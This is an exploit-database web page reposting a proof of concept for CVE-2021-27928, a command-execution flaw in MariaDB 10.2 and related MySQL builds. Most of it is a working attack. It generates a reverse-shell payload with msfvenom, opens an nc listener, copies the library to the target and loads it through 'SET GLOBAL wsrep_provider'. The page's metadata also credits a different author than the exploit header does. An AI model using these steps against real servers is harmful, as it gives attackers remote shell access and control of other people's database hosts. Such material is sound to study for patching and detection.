Advertisement






MariaDB 10.2 /MySQL wsrep_provider OS Command Execution

CVE Category Price Severity
CVE-2021-27928 CWE-78 $5,000 High
Author Risk Exploitation Type Date
Orange Tsai High Remote 2021-04-21
CPE
cpe:cpe:/a:mariadb:mariadb:10.2
CVSS EPSS EPSSP
CVSS:4.6/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L 0.0974 0.7072

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040120

Below is a copy:

MariaDB 10.2 /MySQL wsrep_provider OS Command Execution
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928

# Proof of Concept:

# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

# Start a listener
nc -lvp <port>

# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so

# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.